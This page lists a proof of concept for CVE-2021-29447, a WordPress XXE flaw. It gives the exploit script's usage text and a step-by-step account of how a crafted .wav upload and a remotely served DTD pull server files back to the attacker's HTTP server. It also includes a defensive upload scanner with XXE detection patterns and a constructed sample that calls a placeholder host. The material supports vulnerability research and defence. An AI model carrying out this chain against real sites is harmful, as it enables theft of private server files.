
CVE-2021-29447 PoC — WordPress code issue vulnerability

Associated Vulnerability
Title: WordPress code issue vulnerability (CVE-2021-29447)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It supports hosting personal blog sites on servers running PHP and MySQL. WordPress contains a code issue vulnerability; an attacker who carries out a successful XXE attack can use it to access internal files.
Readme
# CVE-2021-29447-POC

## About

This script automates the steps required to exploit [CVE-2021-29447](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447) in the media upload functionality of WordPress and uses it to extract files via an XXE.

## Usage

```
 ./generate_payloads.py --help
usage: generate_payloads.py [-h] [--local-ip LOCAL_IP] [--local-port LOCAL_PORT] [--media-payload MEDIA_PAYLOAD] [--dtd-payload DTD_PAYLOAD]
                            [--files-to-fetch FILES_TO_FETCH [FILES_TO_FETCH ...]]

CVE-2021-29447 payload generator

options:
  -h, --help            show this help message and exit
  --local-ip LOCAL_IP   Local machine IP address
  --local-port LOCAL_PORT
                        Local machine port which will run an HTTP server to receive the exfiltrated files
  --media-payload MEDIA_PAYLOAD
                        Name of the .wav file containing the exploit to be generated
  --dtd-payload DTD_PAYLOAD
                        Name of the .dtd file containing the exploit to be generated
  --files-to-fetch FILES_TO_FETCH [FILES_TO_FETCH ...]
```

The script does the following:

- First step: It generates a .wav payload that you need to upload to the target server. You can use `--media-payload` to pass its name.
- Second step: It generates a DTD document that will be served locally via an HTTP server. You can use `--dtd-payload` to pass its name. This file contains the absolute paths of the files you would like to extract from the target machine; you can specify a comma-separated list of files via `--files-to-fetch`.
- Third step: It runs a simple Python HTTP server to which the `.wav` payload connects back, both to fetch the second part of the payload (the DTD document) and to send the fetched files from the remote system.
- Fourth step: If all of the files you specified exist on the remote filesystem, they are sent back to the HTTP server Base64-encoded; the script then decodes them and saves them to your current working directory.
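The chain above relies on the uploaded `.wav` file carrying an XML DOCTYPE that points at an externally served DTD. A defender who cannot patch immediately can at least refuse uploads that carry that shape. The following scanner is an added example written for this page; it is not part of the PoC repository and does not reproduce its payload. It assumes nothing about which WAV chunk WordPress parses (the page does not say), so it inspects the raw bytes of the whole upload; the sample files, including the `iXML` metadata chunk and the `http://LOCAL_IP:LOCAL_PORT/payload.dtd` placeholder URL, are constructed here for the test.

```python
"""Defensive pre-upload check for XXE markers inside media files.

Added example for this page, not code from the CVE-2021-29447 PoC.
It flags any upload whose bytes contain a DOCTYPE declaration, an entity
with a SYSTEM/PUBLIC external reference, or a parameter entity (% name):
the three building blocks an out-of-band XXE payload needs.
"""
import re
import struct
from typing import Dict, List, Tuple

# Case-insensitive byte regexes so they work on non-XML containers too.
XXE_PATTERNS = {
    "doctype": re.compile(rb"<!DOCTYPE\b", re.I),
    "external_entity": re.compile(rb"<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b", re.I),
    "parameter_entity": re.compile(rb"<!ENTITY\s+%", re.I),
}


def xxe_indicators(data: bytes) -> List[str]:
    """Return the names of every XXE marker found in the raw bytes."""
    return [name for name, pat in XXE_PATTERNS.items() if pat.search(data)]


def is_riff_wav(data: bytes) -> bool:
    """True if the bytes start with a RIFF/WAVE header."""
    return len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"WAVE"


def build_wav(chunks: List[Tuple[bytes, bytes]]) -> bytes:
    """Construct a minimal RIFF/WAVE file from (chunk id, payload) pairs.

    Used only to build test input; RIFF chunks are word-aligned, so odd
    payloads get a pad byte.
    """
    body = b"WAVE"
    for chunk_id, payload in chunks:
        if len(payload) % 2:
            payload += b"\0"
        body += chunk_id + struct.pack("<I", len(payload)) + payload
    return b"RIFF" + struct.pack("<I", len(body)) + body


def scan_upload(data: bytes) -> Dict[str, object]:
    """Decide whether an upload should be rejected before it reaches the parser."""
    found = xxe_indicators(data)
    return {"is_wav": is_riff_wav(data), "xxe_indicators": found, "reject": bool(found)}


# Constructed samples (not taken from the PoC).
_FMT = struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8)  # PCM, mono, 8 kHz, 8-bit
CLEAN_WAV = build_wav([(b"fmt ", _FMT), (b"data", b"\0" * 8)])

# iXML is a real WAV metadata chunk that carries XML; this body is a constructed
# DOCTYPE with an external parameter entity, the generic shape of an XXE probe.
_SUSPICIOUS_XML = (
    b'<?xml version="1.0"?><!DOCTYPE x [ <!ENTITY % dtd SYSTEM '
    b'"http://LOCAL_IP:LOCAL_PORT/payload.dtd"> %dtd; ]><x/>'
)
SUSPICIOUS_WAV = build_wav([(b"fmt ", _FMT), (b"iXML", _SUSPICIOUS_XML), (b"data", b"\0" * 8)])

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_WAV), ("suspicious", SUSPICIOUS_WAV)):
        print(label, scan_upload(sample))
```

Run the check in whatever hook sits in front of the upload handler; a clean file yields no indicators, while the constructed sample trips all three. Because the regexes run over raw bytes, a payload hidden in any chunk, or in a file that is not a WAV at all, is caught the same way. This is a compensating control, not a fix: the remedy for the CVE is the vendor patch.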

## Disclaimer

This software has been created purely for the purposes of research and for the development of effective mitigation techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
File Snapshot

[4.0K] /data/pocs/cc7ca7730fe0ad648adc56849b2b8ef83679f0ec
├── [ 699] colored_formatter.py
├── [5.9K] generate_payloads.py
└── [2.3K] README.md

0 directories, 3 files